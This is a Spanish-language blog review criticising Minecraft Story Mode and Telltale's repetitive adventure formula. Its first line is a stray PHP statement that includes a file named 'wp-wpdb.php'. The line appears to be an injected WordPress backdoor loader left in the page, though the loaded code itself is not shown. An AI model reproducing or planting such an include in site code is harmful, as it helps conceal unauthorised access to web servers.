if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Minecraft Story Mode – La Fortaleza de LeChuck

Análisis Minecraft Story Mode

Es curioso como los juegos de Telltale son peores cuando tratan de ser juegos. Minecraft Story Mode es la muestra de eso. No se me malinterprete, no soy especial fanático de las aventuras gráficas de Telltale (si es que se le puede considerar así) o de muchas de las historias que narra mediante QTE poco interactivas o los argumentos estiradísimos con los que llevó a cabo el ultimo Tales from the Borderlands. Sin embargo, creo que cualquiera puede entender cuando es hora de detenerse y replantearse el modus operandi de la empresa. En la ultima obra por capítulos queda denostado el cansancio de la formula de Telltale y su imposibilidad aparente de adaptarse correctamente a otros tipos de juego, sobre todo porque cree que el estilo Telltale es el correcto para jugar. Trataré de explicar esto de mejor modo.

minecraft-story-mode

Uno de los diversos objetivos mecánicos del juego (es decir, cuando no nos aburre con su interminable, innecesaria, monótona y aburridísima historia) consiste en construir una casa como lo haríamos en la versión de toda la vida de Minecraft. Sin embargo, en Telltale han creído que hacerlo mediante una QTE pulsando un único botón como si aquello fuese divertido era una gran idea o matar creeps repitiendo de manera incesante las mismas mecánicas de The Walking Dead era la máxima expresión de diversión. No funciona Telltale, la empresa cree que su modo de jugar se puede adaptar a cualquier tipo de mecánicas y si algo demostraron los juegos de David Cage en la consola de Sony es que todo tiene un limite, un limite que Telltale ha superado.

De todos modos, ¿quién llegaría a pensar que la gente se hartaría de hacer exactamente lo mismo con diferentes historias? Pues nadie si la historia era suficientemente buena cabía la posibilidad de que al publico le agradara pulsar botones de manera monótona en pasillos invisibles de juego. Lamentablemente Minecraft por Telltale no tiene nada, ningún aliciente realmente entretenido para engancharse a la historia, con una historia típica y juvenil sobre el elegido para salvar el mundo creado y bla bla bla, tonterías que realmente perjudican al estudio creador y no los culpo por no encontrar nada que contar dentro del universo Minecraft, pero si tienen la culpa de meterse en un lio impensado e irracional que tratan de solucionar con bromas infantiles y chistes tontos que van dirigidos a los niños, claro que van dirigidos a los niños, pero una aventura gráfica con el estilo de Telltale no gusta a los niños y eso requiere un mejor manejo por parte de la empresa, algo que no hay. Telltale confía ciegamente en su técnica y las ventas le han llevado al punto muerto, al estancamiento total de la fórmula y al hastío generalizado hacia sus juegos.

Sin embargo, no todo es malo en esta ecuación cuadrática. Telltale ante todo siempre ha tenido ideas y la capacidad de engañar al personal con la fantasiosa «evolución en base a tus decisiones» y en Minecraft Story Mode lo logran de un modo bastante inusual para su técnica: La creación de herramientas, da la sensación de ser el punto clave sobre el cual sustentan los próximos episodios y genera cierta curiosidad por lo que sucederá después (es curioso como una mecánica es más interesante que la historia en un juego de Telltale) pero quizá es una bagatela que se quedará en nada, el tiempo lo dirá.

minecraft-story-mode-2

A nivel visual debo aceptar que Telltale hace «bonito» Minecraft, hasta el punto de lograr que el espectador sienta que los personajes son algo más que unos voxels, por primera vez entiendo lo que es ver emociones a través de un muñeco de Minecraft y es fantástico que lo hayan logrado, lamentablemente la historia (realmente es vacía, un guion tan desganado…) no acompañe a esas emociones. También es decepcionante como desperdicia el cambio de género en el personaje (algo sorprendente dada la naturaleza icónica de los juegos que desarrolla Telltale) pues realmente no importa el cambio, no hay mayores reacciones del mundo hacia ello.

Entiendo que Minecraft Story Mode es la octava búsqueda de explotar la formula de Telltale y la más arriesgada de sorprender con la franquicia de Minecraft pero esto no la inhabilita de ser un decepcionante titulo, de ser una descarada manera de sacar dinero de los usuarios que no estén informados del estilo de juego de la empresa desarrolladora y, sobre todo, ser la demostración más ineludible del tufo a hartazgo que desprenden los títulos de Telltale desde el notable The Wolf Among Us y no solo eso, el hartazgo se suma a la falta de ideas e imaginación en el mundo de Minecraft el cual parece desdibujado y una historia cualquiera sacada de un fanfiction mal escrito que realmente va a sacar de quicio al espectador por su estupidez y falta de ambición.

No diría de todos modos que es un mal juego, podría mejorar con el paso de los capítulos y quizá el interés se haga mayor mientras se desenvuelve la trama principal pero es difícil arreglar algo que desde la mesa de concepto era una locura enfocada simplemente a la explotación monetaria. No recomendaría comprar Minecraft Story Mode y sobre todo, no recomendaría perder el tiempo en prestarle atención y empeño a un insípido y falto de creatividad titulo que, de todas las obras de Telltale, es el que menos merece una continuación.

Finalmente y como cierre me gustaría recalcar la importancia de un cambio dentro de Telltale pues el próximo titulo podría ser un desastre descomunal (como lo fue el ultimo titulo de Quantic Dream) sino sale de la fosa que estanca el potencial argumental que tiene el estudio desarrollador. Es una pena que gente tan talentosa se dedique a vivir de las rentas de una formula ya abusada.

Por RazorKaen

Jugador clásico que no ha salido de PC desde la primera infancia, cabalgo robot escorpiones gigantes mientras la industria avanza. Soy crítico destructivo y alcalde de alguna ciudad del Sim City, rolero de toda la vida y fanático de los shooter clásicos.